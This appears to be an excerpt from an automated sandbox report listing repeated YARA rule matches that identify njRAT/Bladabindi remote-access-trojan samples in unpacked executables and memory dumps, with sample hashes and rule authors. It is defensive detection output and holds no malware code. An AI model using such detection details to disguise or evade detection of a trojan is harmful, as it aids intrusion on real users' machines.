Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
